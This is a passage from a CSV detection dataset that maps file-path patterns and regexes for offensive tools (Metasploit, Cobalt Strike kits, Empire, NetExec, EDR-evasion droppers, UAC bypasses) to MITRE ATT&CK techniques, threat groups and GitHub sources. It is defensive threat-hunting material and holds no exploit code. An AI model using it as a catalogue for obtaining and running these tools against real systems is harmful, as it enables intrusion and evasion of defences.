large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/Egress-Assess*",".{0,1000}\/Egress\-Assess.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*/elevateit.bat*",".{0,1000}\/elevateit\.bat.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","4","332","47","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z" "*/ElevateKit/elevate.*",".{0,1000}\/ElevateKit\/elevate\..{0,1000}","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","852","195","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" "*/Elevator.git*",".{0,1000}\/Elevator\.git.{0,1000}","offensive_tool_keyword","Elevator","UAC bypass by abusing RPC and debug objects.","T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Kudaes/Elevator","1","1","N/A","10","6","589","68","2023-10-19T08:51:09Z","2022-08-25T21:39:28Z" "*/elf/dll*",".{0,1000}\/elf\/dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/elf/exe*",".{0,1000}\/elf\/exe.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/ELFLoader/*",".{0,1000}\/ELFLoader\/.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a ELF object in memory loader/runner. The goal is to create a single elf loader that can be used to run follow on capabilities across all x86_64 and x86 nix operating systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/ELFLoader","1","1","N/A","10","10","223","41","2022-05-16T17:48:40Z","2022-04-26T19:18:20Z" "*/email_spoof_checks.txt*",".{0,1000}\/email_spoof_checks\.txt.{0,1000}","offensive_tool_keyword","AttackSurfaceMapper","AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target","T1595 - T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/superhedgy/AttackSurfaceMapper","1","0","N/A","6","10","1271","193","2024-04-08T16:13:24Z","2019-08-07T14:32:53Z" "*/EmailAll.git*",".{0,1000}\/EmailAll\.git.{0,1000}","offensive_tool_keyword","EmailAll","EmailAll is a powerful Email Collect tool","T1114.001 - T1113 - T1087.003","TA0009 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Taonn/EmailAll","1","1","N/A","6","7","627","110","2022-03-04T10:36:41Z","2022-02-14T06:55:30Z" "*/emailall.py*",".{0,1000}\/emailall\.py.{0,1000}","offensive_tool_keyword","EmailAll","EmailAll is a powerful Email Collect tool","T1114.001 - T1113 - T1087.003","TA0009 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Taonn/EmailAll","1","1","N/A","6","7","627","110","2022-03-04T10:36:41Z","2022-02-14T06:55:30Z" "*/EmbedInHTML.git*",".{0,1000}\/EmbedInHTML\.git.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","1","N/A","10","5","462","114","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" "*/EmbedInHTML/*",".{0,1000}\/EmbedInHTML\/.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","1","N/A","N/A","5","462","114","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" "*/emotet.profile*",".{0,1000}\/emotet\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","284","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" "*/Empire.git",".{0,1000}\/Empire\.git","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*/empire/client/*",".{0,1000}\/empire\/client\/.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*/empire:latest*",".{0,1000}\/empire\:latest.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*/empire_exec.py*",".{0,1000}\/empire_exec\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/EmpireProject*",".{0,1000}\/EmpireProject.{0,1000}","offensive_tool_keyword","empire","The Empire Multiuser GUI is a graphical interface to the Empire post-exploitation Framework","T1059.003 - T1071.001 - T1543.003 - T1041 - T1562.001","TA0002 - TA0010 - TA0011 ","N/A","N/A","C2","https://github.com/EmpireProject/Empire-GUI","1","1","N/A","10","10","483","144","2022-03-10T11:34:46Z","2018-04-20T21:59:52Z" "*/enable_all_tokens.exe*",".{0,1000}\/enable_all_tokens\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*/EnableAllTokenPrivs.exe*",".{0,1000}\/EnableAllTokenPrivs\.exe.{0,1000}","offensive_tool_keyword","EnableAllTokenPrivs","Enable or Disable TokenPrivilege(s)","T1134 - T1055","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/xvt-void/EnableAllTokenPrivs","1","1","N/A","7","1","11","3","2024-02-18T20:55:05Z","2024-02-17T15:39:25Z" "*/EnableAllTokenPrivs.git*",".{0,1000}\/EnableAllTokenPrivs\.git.{0,1000}","offensive_tool_keyword","EnableAllTokenPrivs","Enable or Disable TokenPrivilege(s)","T1134 - T1055","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/xvt-void/EnableAllTokenPrivs","1","1","N/A","7","1","11","3","2024-02-18T20:55:05Z","2024-02-17T15:39:25Z" "*/EnableAllTokenPrivs.ps1*",".{0,1000}\/EnableAllTokenPrivs\.ps1.{0,1000}","offensive_tool_keyword","EnableAllTokenPrivs","Enable or Disable TokenPrivilege(s)","T1134 - T1055","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/xvt-void/EnableAllTokenPrivs","1","1","N/A","7","1","11","3","2024-02-18T20:55:05Z","2024-02-17T15:39:25Z" "*/enable-user.py*",".{0,1000}\/enable\-user\.py.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*/enableuser/enableuser.x64.*",".{0,1000}\/enableuser\/enableuser\.x64\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*/enableuser/enableuser.x86.*",".{0,1000}\/enableuser\/enableuser\.x86\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*/enc_shellcode.bin*",".{0,1000}\/enc_shellcode\.bin.{0,1000}","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/reveng007/ReflectiveNtdll","1","1","N/A","10","2","159","22","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z" "*/enc_shellcode.h*",".{0,1000}\/enc_shellcode\.h.{0,1000}","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/reveng007/ReflectiveNtdll","1","1","N/A","10","2","159","22","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z" "*/encryption_aes.exe*",".{0,1000}\/encryption_aes\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*/encryption_rc4.exe*",".{0,1000}\/encryption_rc4\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*/enip-info.nse*",".{0,1000}\/enip\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/enum__secrets/*.py*",".{0,1000}\/enum__secrets\/.{0,1000}\.py.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*/enum_av.md*",".{0,1000}\/enum_av\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/enum_av.py*",".{0,1000}\/enum_av\.py.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*/enum_av.py*",".{0,1000}\/enum_av\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/enum_cisco.md*",".{0,1000}\/enum_cisco\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/enum_dns.py*",".{0,1000}\/enum_dns\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/enum_domain_info*",".{0,1000}\/enum_domain_info.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*/enum_f5.md*",".{0,1000}\/enum_f5\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/enum_juniper.md*",".{0,1000}\/enum_juniper\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/enum_osx.md*",".{0,1000}\/enum_osx\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - 